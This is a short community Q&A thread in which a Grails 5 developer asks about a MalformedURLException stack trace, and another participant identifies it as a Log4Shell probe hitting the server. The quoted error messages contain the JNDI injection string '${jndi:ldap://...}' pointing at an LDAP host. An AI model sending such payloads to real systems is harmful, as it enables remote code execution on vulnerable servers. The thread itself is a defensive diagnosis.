Anybody has seen this error? java.net.MalformedURL...
# questions
o
Anybody has seen this error?
java.net.MalformedURLException: unknown protocol: ${jndildap//172.16.2.141:57265/nessus}
java.base/java.net.URL.<init>(URL.java:452)
java.base/java.net.URL.<init>(URL.java:338)
java.base/java.net.URL.<init>(URL.java:361)
asset.pipeline.utils.net.Urls.getDefaultPort(Urls.java:193)
asset.pipeline.grails.utils.net.HttpServletRequests.getAuthorityUrlSansScheme(HttpServletRequests.java:86)
asset.pipeline.grails.utils.net.HttpServletRequests.getBaseUrlSansScheme(HttpServletRequests.java:139)
asset.pipeline.grails.utils.net.HttpServletRequests.getBaseUrlWithScheme(HttpServletRequests.java:123)
asset.pipeline.grails.utils.net.HttpServletRequests.getBaseUrlWithScheme(HttpServletRequests.java:115)
asset.pipeline.grails.AssetProcessorService.makeServerURL(AssetProcessorService.groovy:167)
asset.pipeline.grails.CachingLinkGenerator.makeServerURL(CachingLinkGenerator.groovy:38)
org.grails.web.mapping.DefaultLinkGenerator.getServerBaseURL(DefaultLinkGenerator.groovy:423)
grails.web.mapping.ResponseRedirector.redirect(ResponseRedirector.groovy:107)
I am not using LDAP and have no idea about that IP and /nessus.
Grails 5.3.6
Here is another error, now with a different IP: java.net.MalformedURLException: unknown protocol: ${jndi:ldap://172.16.2.141:56562/nessus}
Sorry, different port.
p
I can't say I am an expert on your issue, but what you show seems weird in terms of Groovy syntax. There seem to be missing quotes. But it could be that you have quotes that aren't being displayed correctly in the error message.
o
This error is not part of my code. I think I have malware. I do not call that IP.
p
It does look like an attempted Log4Shell exploit:
https://security.stackexchange.com/questions/272736/explain-jndildap-spams
https://tblocks.com/articles/how-to-prevent-a-log4j-jndi-attack/
https://qwiet.ai/log4shell-jndi-injection-via-attackable-log4j/
So, not so much malware, but someone playing with a reachable server running your software. The error message doesn't seem to indicate that logging is on the stack trace, but rather that the attempt is hitting another part of your system. It seems that you have JNDI disabled, which is what you'd want to avoid the exploit, though I think it is only JNDI when used with a vulnerable log4j. I haven't developed any public Grails app recently, so I don't know if there is a standard way to catch such attempts.
o
Thanks for your response